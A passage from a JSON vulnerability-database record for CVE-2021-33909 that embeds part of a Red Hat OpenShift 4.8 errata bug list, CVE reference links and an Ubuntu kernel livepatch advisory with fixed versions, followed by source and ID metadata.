Console-operator can not create resource console-public configmap in the openshift-config-managed namespace\n1962718 - CVE-2021-29622 prometheus: open redirect under the /new endpoint\n1962740 - Add documentation to Egress Router\n1962850 - [4.8] Bootimage bump tracker\n1962882 - Version pod does not set priorityClassName\n1962905 - Ramdisk ISO source defaulting to \"http\" breaks deployment on a good amount of BMCs\n1963068 - ironic container should not specify the entrypoint\n1963079 - KCM/KS: ability to enforce localhost communication with the API server. \n1963154 - Current BMAC reconcile flow skips Ironic\u0027s deprovision step\n1963159 - Add Sprint 200 translations\n1963204 - Update to 8.4 IPA images\n1963205 - Installer is using old redirector\n1963208 - Translation typos/inconsistencies for Sprint 200 files\n1963209 - Some strings in public.json have errors\n1963211 - Fix grammar issue in kubevirt-plugin.json string\n1963213 - Memsource download script running into API error\n1963219 - ImageStreamTags not internationalized\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n1963267 - Warning: Invalid DOM property `classname`. Did you mean `className`? console warnings in volumes table\n1963502 - create template from is not descriptive\n1963676 - in vm wizard when selecting an os template it looks like selecting the flavor too\n1963833 - Cluster monitoring operator crashlooping on single node clusters due to segfault\n1963848 - Use OS-shipped stalld vs. the NTO-shipped one. \n1963866 - NTO: use the latest k8s 1.21.1 and openshift vendor dependencies\n1963871 - cluster-etcd-operator:[build] upgrade to go 1.16\n1963896 - The VM disks table does not show easy links to PVCs\n1963912 - \"[sig-network] DNS should provide DNS for {services, cluster, subdomain, hostname}\" failures on vsphere\n1963932 - Installation failures in bootstrap in OpenStack release jobs\n1963964 - Characters are not escaped on config ini file causing Kuryr bootstrap to fail\n1964059 - rebase openshift/sdn to kube 1.21.1\n1964197 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration\n1964203 - e2e-metal-ipi, e2e-metal-ipi-ovn-dualstack and e2e-metal-ipi-ovn-ipv6 are failing due to \"Unknown provider baremetal\"\n1964243 - The `oc compliance fetch-raw` doesn\u2019t work for disconnected cluster\n1964270 - Failed to install \u0027cluster-kube-descheduler-operator\u0027 with error: \"clusterkubedescheduleroperator.4.8.0-202105211057.p0.assembly.stream\\\": must be no more than 63 characters\"\n1964319 - Network policy \"deny all\" interpreted as \"allow all\" in description page\n1964334 - alertmanager/prometheus/thanos-querier /metrics endpoints are not secured\n1964472 - Make project and namespace requirements more visible rather than giving me an error after submission\n1964486 - Bulk adding of CIDR IPS to whitelist is not working\n1964492 - Pick 102171: Implement support for watch initialization in P\u0026F\n1964625 - NETID duplicate check is only required in NetworkPolicy Mode\n1964748 - Sync upstream 1.7.2 downstream\n1964756 - PVC status is always in \u0027Bound\u0027 status when it is actually cloning\n1964847 - Sanity check test suite missing from the repo\n1964888 - opoenshift-apiserver imagestreamimports depend on \u003e34s timeout support, WAS: transport: loopyWriter.run returning. connection error: desc = \"transport is closing\"\n1964936 - error log for \"oc adm catalog mirror\" is not correct\n1964979 - Add mapping from ACI to infraenv to handle creation order issues\n1964997 - Helm Library charts are showing and can be installed from Catalog\n1965024 - [DR] backup and restore should perform consistency checks on etcd snapshots\n1965092 - [Assisted-4.7] [Staging][OLM] Operators deployments start before all workers finished installation\n1965283 - 4.7-\u003e4.8 upgrades: cluster operators are not ready: openshift-controller-manager (Upgradeable=Unknown NoData: ), service-ca (Upgradeable=Unknown NoData:\n1965330 - oc image extract fails due to security capabilities on files\n1965334 - opm index add fails during image extraction\n1965367 - Typo in in etcd-metric-serving-ca resource name\n1965370 - \"Route\" is not translated in Korean or Chinese\n1965391 - When storage class is already present wizard do not jumps to \"Stoarge and nodes\"\n1965422 - runc is missing Provides oci-runtime in rpm spec\n1965522 - [v2v] Multiple typos on VM Import screen\n1965545 - Pod stuck in ContainerCreating: Unit ...slice already exists\n1965909 - Replace \"Enable Taint Nodes\" by \"Mark nodes as dedicated\"\n1965921 - [oVirt] High performance VMs shouldn\u0027t be created with Existing policy\n1965929 - kube-apiserver should use cert auth when reaching out to the oauth-apiserver with a TokenReview request\n1966077 - `hidden` descriptor is visible in the Operator instance details page`\n1966116 - DNS SRV request which worked in 4.7.9 stopped working in 4.7.11\n1966126 - root_ca_cert_publisher_sync_duration_seconds metric can have an excessive cardinality\n1966138 - (release-4.8) Update K8s \u0026 OpenShift API versions\n1966156 - Issue with Internal Registry CA on the service pod\n1966174 - No storage class is installed, OCS and CNV installations fail\n1966268 - Workaround for Network Manager not supporting nmconnections priority\n1966401 - Revamp Ceph Table in Install Wizard flow\n1966410 - kube-controller-manager should not trigger APIRemovedInNextReleaseInUse alert\n1966416 - (release-4.8) Do not exceed the data size limit\n1966459 - \u0027policy/v1beta1 PodDisruptionBudget\u0027 and \u0027batch/v1beta1 CronJob\u0027 appear in image-registry-operator log\n1966487 - IP address in Pods list table are showing node IP other than pod IP\n1966520 - Add button from ocs add capacity should not be enabled if there are no PV\u0027s\n1966523 - (release-4.8) Gather MachineAutoScaler definitions\n1966546 - [master] KubeAPI - keep day1 after cluster is successfully installed\n1966561 - Workload partitioning annotation workaround needed for CSV annotation propagation bug\n1966602 - don\u0027t require manually setting IPv6DualStack feature gate in 4.8\n1966620 - The bundle.Dockerfile in the repo is obsolete\n1966632 - [4.8.0] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install\n1966654 - Alertmanager PDB is not created, but Prometheus UWM is\n1966672 - Add Sprint 201 translations\n1966675 - Admin console string updates\n1966677 - Change comma to semicolon\n1966683 - Translation bugs from Sprint 201 files\n1966684 - Verify \"Creating snapshot for claim \u003c1\u003e{pvcName}\u003c/1\u003e\" displays correctly\n1966697 - Garbage collector logs every interval - move to debug level\n1966717 - include full timestamps in the logs\n1966759 - Enable downstream plugin for Operator SDK\n1966795 - [tests] Release 4.7 broken due to the usage of wrong OCS version\n1966813 - \"Replacing an unhealthy etcd member whose node is not ready\" procedure results in new etcd pod in CrashLoopBackOff\n1966862 - vsphere IPI - local dns prepender is not prepending nameserver 127.0.0.1\n1966892 - [master] [Assisted-4.8][SNO] SNO node cannot transition into \"Writing image to disk\" from \"Waiting for bootkub[e\"\n1966952 - [4.8.0] [Assisted-4.8][SNO][Dual Stack] DHCPv6 settings \"ipv6.dhcp-duid=ll\" missing from dual stack install\n1967104 - [4.8.0] InfraEnv ctrl: log the amount of NMstate Configs baked into the image\n1967126 - [4.8.0] [DOC] KubeAPI docs should clarify that the InfraEnv Spec pullSecretRef is currently ignored\n1967197 - 404 errors loading some i18n namespaces\n1967207 - Getting started card: console customization resources link shows other resources\n1967208 - Getting started card should use semver library for parsing the version instead of string manipulation\n1967234 - Console is continuously polling for ConsoleLink acm-link\n1967275 - Awkward wrapping in getting started dashboard card\n1967276 - Help menu tooltip overlays dropdown\n1967398 - authentication operator still uses previous deleted pod ip rather than the new created pod ip to do health check\n1967403 - (release-4.8) Increase workloads fingerprint gatherer pods limit\n1967423 - [master] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion\n1967444 - openshift-local-storage pods found with invalid priority class, should be openshift-user-critical or begin with system- while running e2e tests\n1967531 - the ccoctl tool should extend MaxItems when listRoles, the default value 100 is a little small\n1967578 - [4.8.0] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion\n1967591 - The ManagementCPUsOverride admission plugin should not mutate containers with the limit\n1967595 - Fixes the remaining lint issues\n1967614 - prometheus-k8s pods can\u0027t be scheduled due to volume node affinity conflict\n1967623 - [OCPonRHV] - ./openshift-install installation with install-config doesn\u0027t work if ovirt-config.yaml doesn\u0027t exist and user should fill the FQDN URL\n1967625 - Add OpenShift Dockerfile for cloud-provider-aws\n1967631 - [4.8.0] Cluster install failed due to timeout while \"Waiting for control plane\"\n1967633 - [4.8.0] [Assisted-4.8][SNO] SNO node cannot transition into \"Writing image to disk\" from \"Waiting for bootkube\"\n1967639 - Console whitescreens if user preferences fail to load\n1967662 - machine-api-operator should not use deprecated \"platform\" field in infrastructures.config.openshift.io\n1967667 - Add Sprint 202 Round 1 translations\n1967713 - Insights widget shows invalid link to the OCM\n1967717 - Insights Advisor widget is missing a description paragraph and contains deprecated naming\n1967745 - When setting DNS node placement by toleration to not tolerate master node, effect value should not allow string other than \"NoExecute\"\n1967803 - should update to 7.5.5 for grafana resources version label\n1967832 - Add more tests for periodic.go\n1967833 - Add tasks pool to tasks_processing\n1967842 - Production logs are spammed on \"OCS requirements validation status Insufficient hosts to deploy OCS. A minimum of 3 hosts is required to deploy OCS\"\n1967843 - Fix null reference to messagesToSearch in gather_logs.go\n1967902 - [4.8.0] Assisted installer chrony manifests missing index numberring\n1967933 - Network-Tools debug scripts not working as expected\n1967945 - [4.8.0] [assisted operator] Assisted Service Postgres crashes msg: \"mkdir: cannot create directory \u0027/var/lib/pgsql/data/userdata\u0027: Permission denied\"\n1968019 - drain timeout and pool degrading period is too short\n1968067 - [master] Agent validation not including reason for being insufficient\n1968168 - [4.8.0] KubeAPI - keep day1 after cluster is successfully installed\n1968175 - [4.8.0] Agent validation not including reason for being insufficient\n1968373 - [4.8.0] BMAC re-attaches installed node on ISO regeneration\n1968385 - [4.8.0] Infra env require pullSecretRef although it shouldn\u0027t be required\n1968435 - [4.8.0] Unclear message in case of missing clusterImageSet\n1968436 - Listeners timeout updated to remain using default value\n1968449 - [4.8.0] Wrong Install-config override documentation\n1968451 - [4.8.0] Garbage collector not cleaning up directories of removed clusters\n1968452 - [4.8.0] [doc] \"Mirror Registry Configuration\" doc section needs clarification of functionality and limitations\n1968454 - [4.8.0] backend events generated with wrong namespace for agent\n1968455 - [4.8.0] Assisted Service operator\u0027s controllers are starting before the base service is ready\n1968515 - oc should set user-agent when talking with registry\n1968531 - Sync upstream 1.8.0 downstream\n1968558 - [sig-cli] oc adm storage-admin [Suite:openshift/conformance/parallel] doesn\u0027t clean up properly\n1968567 - [OVN] Egress router pod not running and openshift.io/scc is restricted\n1968625 - Pods using sr-iov interfaces failign to start for Failed to create pod sandbox\n1968700 - catalog-operator crashes when status.initContainerStatuses[].state.waiting is nil\n1968701 - Bare metal IPI installation is failed due to worker inspection failure\n1968754 - CI: e2e-metal-ipi-upgrade failing on KubeletHasDiskPressure, which triggers machine-config RequiredPoolsFailed\n1969212 - [FJ OCP4.8 Bug - PUBLIC VERSION]: Masters repeat reboot every few minutes during workers provisioning\n1969284 - Console Query Browser: Can\u0027t reset zoom to fixed time range after dragging to zoom\n1969315 - [4.8.0] BMAC doesn\u0027t check if ISO Url changed before queuing BMH for reconcile\n1969352 - [4.8.0] Creating BareMetalHost without the \"inspect.metal3.io\" does not automatically add it\n1969363 - [4.8.0] Infra env should show the time that ISO was generated. \n1969367 - [4.8.0] BMAC should wait for an ISO to exist for 1 minute before using it\n1969386 - Filesystem\u0027s Utilization doesn\u0027t show in VM overview tab\n1969397 - OVN bug causing subports to stay DOWN fails installations\n1969470 - [4.8.0] Misleading error in case of install-config override bad input\n1969487 - [FJ OCP4.8 Bug]: Avoid always do delete_configuration clean step\n1969525 - Replace golint with revive\n1969535 - Topology edit icon does not link correctly when branch name contains slash\n1969538 - Install a VolumeSnapshotClass by default on CSI Drivers that support it\n1969551 - [4.8.0] Assisted service times out on GetNextSteps due to `oc adm release info` taking too long\n1969561 - Test \"an end user can use OLM can subscribe to the operator\" generates deprecation alert\n1969578 - installer: accesses v1beta1 RBAC APIs and causes APIRemovedInNextReleaseInUse to fire\n1969599 - images without registry are being prefixed with registry.hub.docker.com instead of docker.io\n1969601 - manifest for networks.config.openshift.io CRD uses deprecated apiextensions.k8s.io/v1beta1\n1969626 - Portfoward stream cleanup can cause kubelet to panic\n1969631 - EncryptionPruneControllerDegraded: etcdserver: request timed out\n1969681 - MCO: maxUnavailable of ds/machine-config-daemon does not get updated due to missing resourcemerge check\n1969712 - [4.8.0] Assisted service reports a malformed iso when we fail to download the base iso\n1969752 - [4.8.0] [assisted operator] Installed Clusters are missing DNS setups\n1969773 - [4.8.0] Empty cluster name on handleEnsureISOErrors log after applying InfraEnv.yaml\n1969784 - WebTerminal widget should send resize events\n1969832 - Applying a profile with multiple inheritance where parents include a common ancestor fails\n1969891 - Fix rotated pipelinerun status icon issue in safari\n1969900 - Test files should not use deprecated APIs that will trigger APIRemovedInNextReleaseInUse\n1969903 - Provisioning a large number of hosts results in an unexpected delay in hosts becoming available\n1969951 - Cluster local doesn\u0027t work for knative services created from dev console\n1969969 - ironic-rhcos-downloader container uses and old base image\n1970062 - ccoctl does not work with STS authentication\n1970068 - ovnkube-master logs \"Failed to find node ips for gateway\" error\n1970126 - [4.8.0] Disable \"metrics-events\" when deploying using the operator\n1970150 - master pool is still upgrading when machine config reports level / restarts on osimageurl change\n1970262 - [4.8.0] Remove Agent CRD Status fields not needed\n1970265 - [4.8.0] Add State and StateInfo to DebugInfo in ACI and Agent CRDs\n1970269 - [4.8.0] missing role in agent CRD\n1970271 - [4.8.0] Add ProgressInfo to Agent and AgentClusterInstalll CRDs\n1970381 - Monitoring dashboards: Custom time range inputs should retain their values\n1970395 - [4.8.0] SNO with AI/operator - kubeconfig secret is not created until the spoke is deployed\n1970401 - [4.8.0] AgentLabelSelector is required yet not supported\n1970415 - SR-IOV Docs needs documentation for disabling port security on a network\n1970470 - Add pipeline annotation to Secrets which are created for a private repo\n1970494 - [4.8.0] Missing value-filling of log line in assisted-service operator pod\n1970624 - 4.7-\u003e4.8 updates: AggregatedAPIDown for v1beta1.metrics.k8s.io\n1970828 - \"500 Internal Error\" for all openshift-monitoring routes\n1970975 - 4.7 -\u003e 4.8 upgrades on AWS take longer than expected\n1971068 - Removing invalid AWS instances from the CF templates\n1971080 - 4.7-\u003e4.8 CI: KubePodNotReady due to MCD\u0027s 5m sleep between drain attempts\n1971188 - Web Console does not show OpenShift Virtualization Menu with VirtualMachine CRDs of version v1alpha3 !\n1971293 - [4.8.0] Deleting agent from one namespace causes all agents with the same name to be deleted from all namespaces\n1971308 - [4.8.0] AI KubeAPI AgentClusterInstall confusing \"Validated\" condition about VIP not matching machine network\n1971529 - [Dummy bug for robot] 4.7.14 upgrade to 4.8 and then downgrade back to 4.7.14 doesn\u0027t work - clusteroperator/kube-apiserver is not upgradeable\n1971589 - [4.8.0] Telemetry-client won\u0027t report metrics in case the cluster was installed using the assisted operator\n1971630 - [4.8.0] ACM/ZTP with Wan emulation fails to start the agent service\n1971632 - [4.8.0] ACM/ZTP with Wan emulation, several clusters fail to step past discovery\n1971654 - [4.8.0] InfraEnv controller should always requeue for backend response HTTP StatusConflict (code 409)\n1971739 - Keep /boot RW when kdump is enabled\n1972085 - [4.8.0] Updating configmap within AgentServiceConfig is not logged properly\n1972128 - ironic-static-ip-manager container still uses 4.7 base image\n1972140 - [4.8.0] ACM/ZTP with Wan emulation, SNO cluster installs do not show as installed although they are\n1972167 - Several operators degraded because Failed to create pod sandbox when installing an sts cluster\n1972213 - Openshift Installer| UEFI mode | BM hosts have BIOS halted\n1972262 - [4.8.0] \"baremetalhost.metal3.io/detached\" uses boolean value where string is expected\n1972426 - Adopt failure can trigger deprovisioning\n1972436 - [4.8.0] [DOCS] AgentServiceConfig examples in operator.md doc should each contain databaseStorage + filesystemStorage\n1972526 - [4.8.0] clusterDeployments controller should send an event to InfraEnv for backend cluster registration\n1972530 - [4.8.0] no indication for missing debugInfo in AgentClusterInstall\n1972565 - performance issues due to lost node, pods taking too long to relaunch\n1972662 - DPDK KNI modules need some additional tools\n1972676 - Requirements for authenticating kernel modules with X.509\n1972687 - Using bound SA tokens causes causes failures to /apis/authorization.openshift.io/v1/clusterrolebindings\n1972690 - [4.8.0] infra-env condition message isn\u0027t informative in case of missing pull secret\n1972702 - [4.8.0] Domain dummy.com (not belonging to Red Hat) is being used in a default configuration\n1972768 - kube-apiserver setup fail while installing SNO due to port being used\n1972864 - New `local-with-fallback` service annotation does not preserve source IP\n1973018 - Ironic rhcos downloader breaks image cache in upgrade process from 4.7 to 4.8\n1973117 - No storage class is installed, OCS and CNV installations fail\n1973233 - remove kubevirt images and references\n1973237 - RHCOS-shipped stalld systemd units do not use SCHED_FIFO to run stalld. \n1973428 - Placeholder bug for OCP 4.8.0 image release\n1973667 - [4.8] NetworkPolicy tests were mistakenly marked skipped\n1973672 - fix ovn-kubernetes NetworkPolicy 4.7-\u003e4.8 upgrade issue\n1973995 - [Feature:IPv6DualStack] tests are failing in dualstack\n1974414 - Uninstalling kube-descheduler clusterkubedescheduleroperator.4.6.0-202106010807.p0.git.5db84c5 removes some clusterrolebindings\n1974447 - Requirements for nvidia GPU driver container for driver toolkit\n1974677 - [4.8.0] KubeAPI CVO progress is not available on CR/conditions only in events. \n1974718 - Tuned net plugin fails to handle net devices with n/a value for a channel\n1974743 - [4.8.0] All resources not being cleaned up after clusterdeployment deletion\n1974746 - [4.8.0] File system usage not being logged appropriately\n1974757 - [4.8.0] Assisted-service deployed on an IPv6 cluster installed with proxy: agentclusterinstall shows error pulling an image from quay. \n1974773 - Using bound SA tokens causes fail to query cluster resource especially in a sts cluster\n1974839 - CVE-2021-29059 nodejs-is-svg: Regular expression denial of service if the application is provided and checks a crafted invalid SVG string\n1974850 - [4.8] coreos-installer failing Execshield\n1974931 - [4.8.0] Assisted Service Operator should be Infrastructure Operator for Red Hat OpenShift\n1974978 - 4.8.0.rc0 upgrade hung, stuck on DNS clusteroperator progressing\n1975155 - Kubernetes service IP cannot be accessed for rhel worker\n1975227 - [4.8.0] KubeAPI Move conditions consts to CRD types\n1975360 - [4.8.0] [master] timeout on kubeAPI subsystem test: SNO full install and validate MetaData\n1975404 - [4.8.0] Confusing behavior when multi-node spoke workers present when only controlPlaneAgents specified\n1975432 - Alert InstallPlanStepAppliedWithWarnings does not resolve\n1975527 - VMware UPI is configuring static IPs via ignition rather than afterburn\n1975672 - [4.8.0] Production logs are spammed on \"Found unpreparing host: id 08f22447-2cf1-a107-eedf-12c7421f7380 status insufficient\"\n1975789 - worker nodes rebooted when we simulate a case where the api-server is down\n1975938 - gcp-realtime: e2e test failing [sig-storage] Multi-AZ Cluster Volumes should only be allowed to provision PDs in zones where nodes exist [Suite:openshift/conformance/parallel] [Suite:k8s]\n1975964 - 4.7 nightly upgrade to 4.8 and then downgrade back to 4.7 nightly doesn\u0027t work -  ingresscontroller \"default\" is degraded\n1976079 - [4.8.0] Openshift Installer| UEFI mode | BM hosts have BIOS halted\n1976263 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]\n1976376 - disable jenkins client plugin test whose Jenkinsfile references master branch openshift/origin artifacts\n1976590 - [Tracker] [SNO][assisted-operator][nmstate] Bond Interface is down when booting from the discovery ISO\n1977233 - [4.8] Unable to authenticate against IDP after upgrade to 4.8-rc.1\n1977351 - CVO pod skipped by workload partitioning with incorrect error stating cluster is not SNO\n1977352 - [4.8.0] [SNO] No DNS to cluster API from assisted-installer-controller\n1977426 - Installation of OCP 4.6.13 fails when teaming interface is used with OVNKubernetes\n1977479 - CI failing on firing CertifiedOperatorsCatalogError due to slow livenessProbe responses\n1977540 - sriov webhook not worked when upgrade from 4.7 to 4.8\n1977607 - [4.8.0] Post making changes to AgentServiceConfig assisted-service operator is not detecting the change and redeploying assisted-service pod\n1977924 - Pod fails to run when a custom SCC with a specific set of volumes is used\n1980788 - NTO-shipped stalld can segfault\n1981633 - enhance service-ca injection\n1982250 - Performance Addon Operator fails to install after catalog source becomes ready\n1982252 - olm Operator is in CrashLoopBackOff state with error \"couldn\u0027t cleanup cross-namespace ownerreferences\"\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2183\nhttps://access.redhat.com/security/cve/CVE-2020-7774\nhttps://access.redhat.com/security/cve/CVE-2020-15106\nhttps://access.redhat.com/security/cve/CVE-2020-15112\nhttps://access.redhat.com/security/cve/CVE-2020-15113\nhttps://access.redhat.com/security/cve/CVE-2020-15114\nhttps://access.redhat.com/security/cve/CVE-2020-15136\nhttps://access.redhat.com/security/cve/CVE-2020-26160\nhttps://access.redhat.com/security/cve/CVE-2020-26541\nhttps://access.redhat.com/security/cve/CVE-2020-28469\nhttps://access.redhat.com/security/cve/CVE-2020-28500\nhttps://access.redhat.com/security/cve/CVE-2020-28852\nhttps://access.redhat.com/security/cve/CVE-2021-3114\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3516\nhttps://access.redhat.com/security/cve/CVE-2021-3517\nhttps://access.redhat.com/security/cve/CVE-2021-3518\nhttps://access.redhat.com/security/cve/CVE-2021-3520\nhttps://access.redhat.com/security/cve/CVE-2021-3537\nhttps://access.redhat.com/security/cve/CVE-2021-3541\nhttps://access.redhat.com/security/cve/CVE-2021-3636\nhttps://access.redhat.com/security/cve/CVE-2021-20206\nhttps://access.redhat.com/security/cve/CVE-2021-20271\nhttps://access.redhat.com/security/cve/CVE-2021-20291\nhttps://access.redhat.com/security/cve/CVE-2021-21419\nhttps://access.redhat.com/security/cve/CVE-2021-21623\nhttps://access.redhat.com/security/cve/CVE-2021-21639\nhttps://access.redhat.com/security/cve/CVE-2021-21640\nhttps://access.redhat.com/security/cve/CVE-2021-21648\nhttps://access.redhat.com/security/cve/CVE-2021-22133\nhttps://access.redhat.com/security/cve/CVE-2021-23337\nhttps://access.redhat.com/security/cve/CVE-2021-23362\nhttps://access.redhat.com/security/cve/CVE-2021-23368\nhttps://access.redhat.com/security/cve/CVE-2021-23382\nhttps://access.redhat.com/security/cve/CVE-2021-25735\nhttps://access.redhat.com/security/cve/CVE-2021-25737\nhttps://access.redhat.com/security/cve/CVE-2021-26539\nhttps://access.redhat.com/security/cve/CVE-2021-26540\nhttps://access.redhat.com/security/cve/CVE-2021-27292\nhttps://access.redhat.com/security/cve/CVE-2021-28092\nhttps://access.redhat.com/security/cve/CVE-2021-29059\nhttps://access.redhat.com/security/cve/CVE-2021-29622\nhttps://access.redhat.com/security/cve/CVE-2021-32399\nhttps://access.redhat.com/security/cve/CVE-2021-33034\nhttps://access.redhat.com/security/cve/CVE-2021-33194\nhttps://access.redhat.com/security/cve/CVE-2021-33909\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYQCOF9zjgjWX9erEAQjsEg/+NSFQdRcZpqA34LWRtxn+01y2MO0WLroQ\nd4o+3h0ECKYNRFKJe6n7z8MdmPpvV2uNYN0oIwidTESKHkFTReQ6ZolcV/sh7A26\nZ7E+hhpTTObxAL7Xx8nvI7PNffw3CIOZSpnKws5TdrwuMkH5hnBSSZntP5obp9Vs\nImewWWl7CNQtFewtXbcmUojNzIvU1mujES2DTy2ffypLoOW6kYdJzyWubigIoR6h\ngep9HKf1X4oGPuDNF5trSdxKwi6W68+VsOA25qvcNZMFyeTFhZqowot/Jh1HUHD8\nTWVpDPA83uuExi/c8tE8u7VZgakWkRWcJUsIw68VJVOYGvpP6K/MjTpSuP2itgUX\nX//1RGQM7g6sYTCSwTOIrMAPbYH0IMbGDjcS4fSZcfg6c+WJnEpZ72ZgjHZV8mxb\n1BtQSs2lil48/cwDKM0yMO2nYsKiz4DCCx2W5izP0rLwNA8Hvqh9qlFgkxJWWOvA\nmtBCelB0E74qrE4NXbX+MIF7+ZQKjd1evE91/VWNs0FLR/xXdP3C5ORLU3Fag0G/\n0oTV73NdxP7IXVAdsECwU2AqS9ne1y01zJKtd7hq7H/wtkbasqCNq5J7HikJlLe6\ndpKh5ZRQzYhGeQvho9WQfz/jd4HZZTcB6wxrWubbd05bYt/i/0gau90LpuFEuSDx\n+bLvJlpGiMg=\n=NJcM\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Linux kernel vulnerabilities\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n-   Ubuntu 20.04 LTS\n-   Ubuntu 18.04 LTS\n-   Ubuntu 16.04 ESM\n-   Ubuntu 14.04 ESM\n\nSummary\n\nSeveral security issues were fixed in the kernel. An attacker in a guest VM could use\nthis to write to portions of the host\u2019s physical memory. (CVE-2021-3653)\n\nMaxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor\nimplementation for AMD processors in the Linux kernel allowed a guest VM\nto disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker\nin a guest VM could use this to read or write portions of the host\u2019s\nphysical memory. (CVE-2021-3656)\n\nAndy Nguyen discovered that the netfilter subsystem in the Linux kernel\ncontained an out-of-bounds write in its setsockopt() implementation. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2021-22555)\n\nIt was discovered that the virtual file system implementation in the\nLinux kernel contained an unsigned to signed integer conversion error. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or execute arbitrary code. (CVE-2021-33909)\n\nUpdate instructions\n\nThe problem can be corrected by updating your kernel livepatch to the\nfollowing versions:\n\nUbuntu 20.04 LTS\n    gcp - 81.1\n    generic - 81.1\n    gke - 81.1\n    gkeop - 81.1\n    lowlatency - 81.1\n\nUbuntu 18.04 LTS\n    generic - 81.1\n    gke - 81.1\n    gkeop - 81.1\n    lowlatency - 81.1\n    oem - 81.1\n\nUbuntu 16.04 ESM\n    generic - 81.1\n    lowlatency - 81.1\n\nUbuntu 14.04 ESM\n    generic - 81.1\n    lowlatency - 81.1\n\nSupport Information\n\nKernels older than the levels listed below do not receive livepatch\nupdates. If you are running a kernel version earlier than the one listed\nbelow, please upgrade your kernel as soon as possible. \n\nUbuntu 20.04 LTS\n    linux-aws - 5.4.0-1009\n    linux-azure - 5.4.0-1010\n    linux-gcp - 5.4.0-1009\n    linux-gke - 5.4.0-1033\n    linux-gkeop - 5.4.0-1009\n    linux-oem - 5.4.0-26\n    linux - 5.4.0-26\n\nUbuntu 18.04 LTS\n    linux-aws - 4.15.0-1054\n    linux-gke-4.15 - 4.15.0-1076\n    linux-gke-5.4 - 5.4.0-1009\n    linux-gkeop-5.4 - 5.4.0-1007\n    linux-hwe-5.4 - 5.4.0-26\n    linux-oem - 4.15.0-1063\n    linux - 4.15.0-69\n\nUbuntu 16.04 ESM\n    linux-aws - 4.4.0-1098\n    linux-azure - 4.15.0-1063\n    linux-azure - 4.15.0-1078\n    linux-hwe - 4.15.0-69\n    linux - 4.4.0-168\n    linux - 4.4.0-211\n\nUbuntu 14.04 ESM\n    linux-lts-xenial - 4.4.0-168\n\nReferences\n\n-   CVE-2021-3653\n-   CVE-2021-3656\n-   CVE-2021-22555\n-   CVE-2021-33909\n\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909",
        "trust": 2.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164155",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163671",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "163621",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "165477",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/22/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/4",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/21/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/08/25/10",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/2",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/20/1",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163590",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163595",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163601",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163606",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163608",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163619",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163568",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163682",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163690",
        "trust": 0.1
      }
    ],
    "sources": [
      {
